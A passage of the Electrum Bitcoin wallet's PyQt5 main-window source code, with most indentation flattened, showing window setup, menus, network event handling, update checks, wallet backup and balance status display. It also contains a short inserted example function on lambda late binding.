# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, InvoiceError)
from electrum.util import PR_TYPE_ONCHAIN, PR_TYPE_LN
from electrum.lnutil import PaymentFailure, SENT, RECEIVED
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.util import PR_PAID, PR_UNPAID, PR_INFLIGHT, PR_FAILED
from electrum.util import pr_expiration_values
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
MONOSPACE_FONT)
from .util import ButtonsTextEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
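# Aside (illustrative, not part of Electrum): the Alt+N tab shortcuts and the
# "recently open" menu in ElectrumWindow below rely on binding the loop variable
# at definition time (lambda i=i / a loader(k) closure); a bare lambda would
# capture the variable by reference and every callback would see its final value.
def _example_late_binding():
    callbacks_wrong = [lambda: i for i in range(3)]
    callbacks_right = [lambda i=i: i for i in range(3)]
    assert [f() for f in callbacks_wrong] == [2, 2, 2]
    assert [f() for f in callbacks_right] == [0, 1, 2]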
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.send_tab_is_onchain = False
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab(wallet)
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
if self.wallet.has_lightning():
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'invoice_status', 'request_status']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'channels_updated':
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.lnworker:
wallet.lnworker.on_channels_updated()
self.need_update.set()
        # Once the GUI has been initialized, check if we want to announce something,
        # since the callback has been called before the GUI was initialized.
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
if self.wallet.has_lightning():
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
        # "Settings"/"Preferences" are reserved keywords in macOS; use this as a workaround
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
if self.wallet.has_lightning():
tools_menu.addAction(_("&Lightning"), self.gui_object.show_lightning_dialog)
tools_menu.addAction(_("&Watchtower"), self.gui_object.show_watchtower_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.lnworker:
l = self.wallet.lnworker.get_balance()
text += u' \U0001f5f2 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_channels_tab(self, wallet):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
